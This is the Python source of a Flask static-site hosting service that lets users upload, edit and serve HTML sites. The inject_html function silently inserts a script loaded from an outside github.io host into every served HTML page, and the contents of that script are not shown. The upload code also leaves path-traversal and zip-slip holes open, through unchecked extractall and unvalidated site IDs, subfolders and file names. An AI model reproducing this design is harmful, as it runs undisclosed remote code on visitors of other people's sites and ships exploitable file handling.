h / app.py
Xlnk's picture
Upload 13 files
e767f32 verified
import os, zipfile, sqlite3, uuid, shutil, secrets, json
from datetime import datetime
from flask import Flask, request, render_template, redirect, url_for, abort, Response, send_from_directory, flash, make_response
APP_NAME = "h by Xlnk"
UPLOAD_DIR = "uploads"
DB = "data.db"
INJECT_SCRIPT = '<script src="https://trejduu32-code.github.io/supreme-engine/a.js" defer></script>'
BRAND_COMMENT = '<!-- h by Xlnk -->'
os.makedirs(UPLOAD_DIR, exist_ok=True)
app = Flask(__name__)
app.secret_key = secrets.token_hex(32)
# ---------- DATABASE ----------
def db():
return sqlite3.connect(DB)
def init_db():
with db() as c:
c.execute("""
CREATE TABLE IF NOT EXISTS sites (
id TEXT PRIMARY KEY,
created TEXT,
views INTEGER DEFAULT 0,
expires TEXT,
edit_token TEXT
)
""")
# Add edit_token column if it doesn't exist (migration)
try:
c.execute("ALTER TABLE sites ADD COLUMN edit_token TEXT")
except sqlite3.OperationalError:
pass # Column already exists
# Initialize database on module load (ensures it works with gunicorn)
init_db()
# ---------- TOKEN MANAGEMENT (COOKIES) ----------
def get_user_tokens():
"""Get all tokens stored in user's cookies"""
tokens_json = request.cookies.get('site_tokens', '{}')
try:
return json.loads(tokens_json)
except:
return {}
def save_token_to_response(response, site_id, token):
"""Add a token to the user's cookie"""
tokens = get_user_tokens()
tokens[site_id] = token
response.set_cookie('site_tokens', json.dumps(tokens), max_age=365*24*60*60, httponly=True, samesite='Lax')
return response
def remove_token_from_response(response, site_id):
"""Remove a token from the user's cookie"""
tokens = get_user_tokens()
tokens.pop(site_id, None)
response.set_cookie('site_tokens', json.dumps(tokens), max_age=365*24*60*60, httponly=True, samesite='Lax')
return response
def get_token_for_site(site_id):
"""Get token for a specific site from cookies"""
tokens = get_user_tokens()
return tokens.get(site_id)
def verify_token(site_id, token):
"""Check if the provided token matches the site's edit token"""
if not token:
return False
with db() as c:
row = c.execute("SELECT edit_token FROM sites WHERE id=?", (site_id,)).fetchone()
if row and row[0] == token:
return True
return False
def user_owns_site(site_id):
"""Check if the current user owns the site (has valid token in cookies)"""
token = get_token_for_site(site_id)
return verify_token(site_id, token)
# ---------- HTML INJECTION ----------
def inject_html(html):
if "supreme-engine/a.js" in html:
return html
block = BRAND_COMMENT + "\n" + INJECT_SCRIPT + "\n"
lower = html.lower()
if "</head>" in lower:
i = lower.rfind("</head>")
return html[:i] + block + html[i:]
return block + html
# ---------- AUTO CLEANUP ----------
def cleanup():
now = datetime.utcnow()
with db() as c:
rows = c.execute("SELECT id, expires FROM sites").fetchall()
for site_id, exp in rows:
if exp and datetime.fromisoformat(exp) < now:
shutil.rmtree(os.path.join(UPLOAD_DIR, site_id), ignore_errors=True)
c.execute("DELETE FROM sites WHERE id=?", (site_id,))
# ---------- ROUTES ----------
@app.route("/")
def home():
return redirect(url_for('my_sites'))
@app.route("/my-sites")
def my_sites():
"""Show only the sites the user owns (has tokens for)"""
cleanup()
user_tokens = get_user_tokens()
if not user_tokens:
# No sites yet
return render_template("my_sites.html", sites=[])
# Get only sites that the user has valid tokens for
my_sites_list = []
with db() as c:
for site_id, token in user_tokens.items():
row = c.execute("SELECT * FROM sites WHERE id=? AND edit_token=?", (site_id, token)).fetchone()
if row:
my_sites_list.append(row)
# Sort by created date (newest first)
my_sites_list.sort(key=lambda x: x[1] if x[1] else '', reverse=True)
return render_template("my_sites.html", sites=my_sites_list)
@app.route("/upload", methods=["GET", "POST"])
def upload():
cleanup()
if request.method == "POST":
file = request.files["file"]
site_id = request.form.get("site_id") or uuid.uuid4().hex[:6]
expires = request.form.get("expires") or None
# Generate a unique edit token for this site
edit_token = secrets.token_urlsafe(32)
site_path = os.path.join(UPLOAD_DIR, site_id)
if os.path.exists(site_path):
flash("Site ID already taken", "error")
return render_template("upload.html")
os.makedirs(site_path)
if file.filename.endswith(".zip"):
zip_path = os.path.join(site_path, "site.zip")
file.save(zip_path)
with zipfile.ZipFile(zip_path) as z:
z.extractall(site_path)
os.remove(zip_path)
else:
file.save(os.path.join(site_path, "index.html"))
with db() as c:
c.execute(
"INSERT INTO sites VALUES (?, ?, 0, ?, ?)",
(site_id, datetime.utcnow().isoformat(), expires, edit_token)
)
flash("Site uploaded successfully!", "success")
# Create response and save token to cookie
response = make_response(redirect(url_for("manage_site", site_id=site_id)))
save_token_to_response(response, site_id, edit_token)
return response
return render_template("upload.html")
@app.route("/manage/<site_id>")
def manage_site(site_id):
"""Manage a specific site - auto-checks token from cookies"""
if not user_owns_site(site_id):
flash("You don't have access to this site.", "error")
return redirect(url_for('my_sites'))
with db() as c:
site = c.execute("SELECT * FROM sites WHERE id=?", (site_id,)).fetchone()
if not site:
abort(404)
return render_template("manage.html", site=site, site_id=site_id)
@app.route("/delete/<site_id>")
def delete(site_id):
"""Delete a site - auto-checks token from cookies"""
if not user_owns_site(site_id):
flash("You don't have access to this site.", "error")
return redirect(url_for('my_sites'))
shutil.rmtree(os.path.join(UPLOAD_DIR, site_id), ignore_errors=True)
with db() as c:
c.execute("DELETE FROM sites WHERE id=?", (site_id,))
# Remove token from cookies
response = make_response(redirect(url_for("my_sites")))
remove_token_from_response(response, site_id)
flash("Site deleted", "success")
return response
# ---------- FILE MANAGEMENT ----------
def get_all_files(directory):
"""Recursively get all files in a directory"""
files = []
for root, dirs, filenames in os.walk(directory):
for filename in filenames:
full_path = os.path.join(root, filename)
rel_path = os.path.relpath(full_path, directory)
files.append(rel_path.replace("\\", "/"))
return sorted(files)
@app.route("/files/<site_id>")
def list_files(site_id):
"""List files in a site - auto-checks token from cookies"""
if not user_owns_site(site_id):
flash("You don't have access to this site.", "error")
return redirect(url_for('my_sites'))
site_path = os.path.join(UPLOAD_DIR, site_id)
if not os.path.exists(site_path):
abort(404)
files = get_all_files(site_path)
return render_template("files.html", site_id=site_id, files=files)
@app.route("/edit/<site_id>/<path:file>")
def edit_file(site_id, file):
"""Edit a file - auto-checks token from cookies"""
if not user_owns_site(site_id):
flash("You don't have access to this site.", "error")
return redirect(url_for('my_sites'))
path = os.path.join(UPLOAD_DIR, site_id, file)
if not os.path.exists(path):
abort(404)
try:
with open(path, encoding="utf-8", errors="ignore") as f:
content = f.read()
except:
content = "[Binary file - cannot edit]"
return render_template("edit.html", site_id=site_id, file=file, content=content)
@app.route("/save/<site_id>/<path:file>", methods=["POST"])
def save_file(site_id, file):
"""Save a file - auto-checks token from cookies"""
if not user_owns_site(site_id):
flash("You don't have access to this site.", "error")
return redirect(url_for('my_sites'))
path = os.path.join(UPLOAD_DIR, site_id, file)
if not os.path.exists(path):
abort(404)
content = request.form.get("content", "")
with open(path, "w", encoding="utf-8") as f:
f.write(content)
flash("File saved", "success")
return redirect(url_for("list_files", site_id=site_id))
@app.route("/delete-file/<site_id>/<path:file>")
def delete_file(site_id, file):
"""Delete a file - auto-checks token from cookies"""
if not user_owns_site(site_id):
flash("You don't have access to this site.", "error")
return redirect(url_for('my_sites'))
site_path = os.path.join(UPLOAD_DIR, site_id)
path = os.path.join(site_path, file)
if not os.path.exists(path):
abort(404)
os.remove(path)
# Clean up empty parent directories
parent = os.path.dirname(path)
while parent != site_path and os.path.isdir(parent) and not os.listdir(parent):
os.rmdir(parent)
parent = os.path.dirname(parent)
flash("File deleted", "success")
return redirect(url_for("list_files", site_id=site_id))
@app.route("/create-file/<site_id>", methods=["GET", "POST"])
def create_file(site_id):
"""Create a new file - auto-checks token from cookies"""
if not user_owns_site(site_id):
flash("You don't have access to this site.", "error")
return redirect(url_for('my_sites'))
site_path = os.path.join(UPLOAD_DIR, site_id)
if not os.path.exists(site_path):
abort(404)
if request.method == "POST":
filename = request.form.get("filename", "").strip()
content = request.form.get("content", "")
# Validate filename
if not filename:
flash("Please enter a filename", "error")
return render_template("create_file.html", site_id=site_id)
# Security: prevent path traversal
if ".." in filename or filename.startswith("/") or filename.startswith("\\"):
flash("Invalid filename", "error")
return render_template("create_file.html", site_id=site_id)
# Normalize path
filename = filename.replace("\\", "/")
file_path = os.path.join(site_path, filename)
# Check if file already exists
if os.path.exists(file_path):
flash("A file with this name already exists", "error")
return render_template("create_file.html", site_id=site_id, filename=filename, content=content)
# Create parent directories if needed
parent_dir = os.path.dirname(file_path)
if parent_dir and not os.path.exists(parent_dir):
os.makedirs(parent_dir, exist_ok=True)
# Create the file
with open(file_path, "w", encoding="utf-8") as f:
f.write(content)
flash(f"File '{filename}' created", "success")
return redirect(url_for("list_files", site_id=site_id))
return render_template("create_file.html", site_id=site_id)
@app.route("/rename-file/<site_id>/<path:file>", methods=["GET", "POST"])
def rename_file(site_id, file):
"""Rename a file - auto-checks token from cookies"""
if not user_owns_site(site_id):
flash("You don't have access to this site.", "error")
return redirect(url_for('my_sites'))
site_path = os.path.join(UPLOAD_DIR, site_id)
old_path = os.path.join(site_path, file)
if not os.path.exists(old_path):
abort(404)
if request.method == "POST":
new_name = request.form.get("new_name", "").strip()
# Validate new filename
if not new_name:
flash("Please enter a new filename", "error")
return render_template("rename_file.html", site_id=site_id, file=file)
# Security: prevent path traversal
if ".." in new_name or new_name.startswith("/") or new_name.startswith("\\"):
flash("Invalid filename", "error")
return render_template("rename_file.html", site_id=site_id, file=file)
# Normalize path
new_name = new_name.replace("\\", "/")
new_path = os.path.join(site_path, new_name)
# Check if target already exists
if os.path.exists(new_path):
flash("A file with this name already exists", "error")
return render_template("rename_file.html", site_id=site_id, file=file, new_name=new_name)
# Create parent directories if needed
parent_dir = os.path.dirname(new_path)
if parent_dir and not os.path.exists(parent_dir):
os.makedirs(parent_dir, exist_ok=True)
# Rename the file
shutil.move(old_path, new_path)
# Clean up empty parent directories from old location
old_parent = os.path.dirname(old_path)
while old_parent != site_path and os.path.isdir(old_parent) and not os.listdir(old_parent):
os.rmdir(old_parent)
old_parent = os.path.dirname(old_parent)
flash(f"File renamed to '{new_name}'", "success")
return redirect(url_for("list_files", site_id=site_id))
return render_template("rename_file.html", site_id=site_id, file=file)
@app.route("/upload/<site_id>", methods=["POST"])
def upload_to_site(site_id):
"""Upload files to a site - auto-checks token from cookies"""
if not user_owns_site(site_id):
flash("You don't have access to this site.", "error")
return redirect(url_for('my_sites'))
site_path = os.path.join(UPLOAD_DIR, site_id)
if not os.path.exists(site_path):
abort(404)
file = request.files.get("file")
subfolder = request.form.get("subfolder", "").strip().strip("/")
if not file or not file.filename:
return redirect(url_for("list_files", site_id=site_id))
# Determine target directory
target_dir = os.path.join(site_path, subfolder) if subfolder else site_path
os.makedirs(target_dir, exist_ok=True)
if file.filename.endswith(".zip"):
# Extract ZIP file
zip_path = os.path.join(target_dir, "temp.zip")
file.save(zip_path)
with zipfile.ZipFile(zip_path) as z:
z.extractall(target_dir)
os.remove(zip_path)
else:
# Save single file
file.save(os.path.join(target_dir, file.filename))
flash("File uploaded", "success")
return redirect(url_for("list_files", site_id=site_id))
@app.route("/h/<site_id>/")
@app.route("/h/<site_id>/<path:file>")
def serve(site_id, file="index.html"):
path = os.path.join(UPLOAD_DIR, site_id, file)
if not os.path.exists(path):
abort(404)
with db() as c:
c.execute("UPDATE sites SET views = views + 1 WHERE id=?", (site_id,))
if file.lower().endswith(".html"):
with open(path, encoding="utf-8", errors="ignore") as f:
html = inject_html(f.read())
return Response(html, mimetype="text/html")
return send_from_directory(os.path.dirname(path), os.path.basename(path))
# ---------- START ----------
if __name__ == "__main__":
init_db()
app.run(debug=True)